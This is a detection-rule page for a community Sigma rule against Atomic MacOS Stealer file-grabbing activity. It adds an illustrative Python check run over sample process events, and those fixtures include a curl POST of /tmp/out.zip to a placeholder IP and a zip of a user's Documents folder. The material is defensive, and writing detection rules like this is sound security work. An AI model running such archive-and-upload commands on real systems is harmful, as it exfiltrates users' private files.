Atomic MacOS Stealer - FileGrabber Activity

Rule Info

Name: Atomic MacOS Stealer - FileGrabber Activity
Author: Jason Phang Vern - Onn, Robbin Ooi Zhen Heng (Gen Digital)
Description: Detects suspicious activity associated with Atomic MacOS Stealer (Amos) campaigns, including execution of FileGrabber and curl-based POST requests used for data exfiltration. The rule identifies either the execution of FileGrabber targeting /tmp or the use of curl to POST sensitive user data (including files such as /tmp/out.zip) to remote servers, which are key indicators of Amos infostealer activity.
Date: 2025-11-22 00:00:00
Modified: None
Id: e710a880-1f18-4417-b6a0-b5afdf7e33da
Tags: attack.execution attack.t1059.002 detection.emerging-threats
Type: Community Rule
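To make the two conditions in the description concrete, here is an added example (not the Sigma rule itself or Gen Digital's code) that evaluates them over constructed macOS process-creation events; the event field names ("image", "command_line"), the list of curl body/upload flags and the sample events are assumptions for illustration, not the rule's actual selection.

```python
import shlex
from typing import Dict, List

# Constructed sample process-creation events; the field names ("image",
# "command_line") are an assumption, not the rule's own selection keys.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"image": "/Users/Shared/FileGrabber", "command_line": "FileGrabber /tmp"},
    {"image": "/usr/bin/curl",
     "command_line": "curl -X POST -F 'file=@/tmp/out.zip' http://203.0.113.5/upload"},
    {"image": "/usr/bin/curl",
     "command_line": "curl -sL https://example.com/index.html -o /tmp/index.html"},
    {"image": "/usr/bin/zip",
     "command_line": "zip -r /tmp/out.zip /Users/alice/Documents"},
]

# curl options that send a request body or upload a file (assumed list).
BODY_FLAGS = ("-F", "--form", "-d", "--data", "--data-binary", "--data-raw",
              "-T", "--upload-file")


def _basename(path: str) -> str:
    return path.rsplit("/", 1)[-1]


def filegrabber_targets_tmp(event: Dict[str, str]) -> bool:
    """Condition 1: a process named FileGrabber invoked with /tmp on its command line."""
    return (_basename(event.get("image", "")) == "FileGrabber"
            and "/tmp" in event.get("command_line", ""))


def curl_posts_tmp_data(event: Dict[str, str]) -> bool:
    """Condition 2: curl sending a POST/body to a remote URL while referencing a /tmp path."""
    if _basename(event.get("image", "")) != "curl":
        return False
    cmd = event.get("command_line", "")
    try:
        args = shlex.split(cmd)
    except ValueError:          # unbalanced quotes: fall back to a naive split
        args = cmd.split()
    posting = any(a in BODY_FLAGS for a in args) or any(
        a in ("-X", "--request") and i + 1 < len(args) and args[i + 1].upper() == "POST"
        for i, a in enumerate(args))
    remote = any(a.startswith(("http://", "https://")) for a in args)
    return posting and remote and "/tmp/" in cmd


def matching_events(events: List[Dict[str, str]]) -> List[int]:
    """Indexes of events satisfying either condition (the rule's OR)."""
    return [i for i, e in enumerate(events)
            if filegrabber_targets_tmp(e) or curl_posts_tmp_data(e)]
```

Only the FileGrabber execution and the POST-with-/tmp/out.zip event match; the plain curl download and the zip command do not, which is the distinction a triage analyst would expect from the rule.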

Rule History

Author: JasonPhang98
Title: Merge PR #5669 from @JasonPhang98 - Extend Atomic MacOS Stealer - FileGrabber Rules
Date: 2025-11-24
Commit: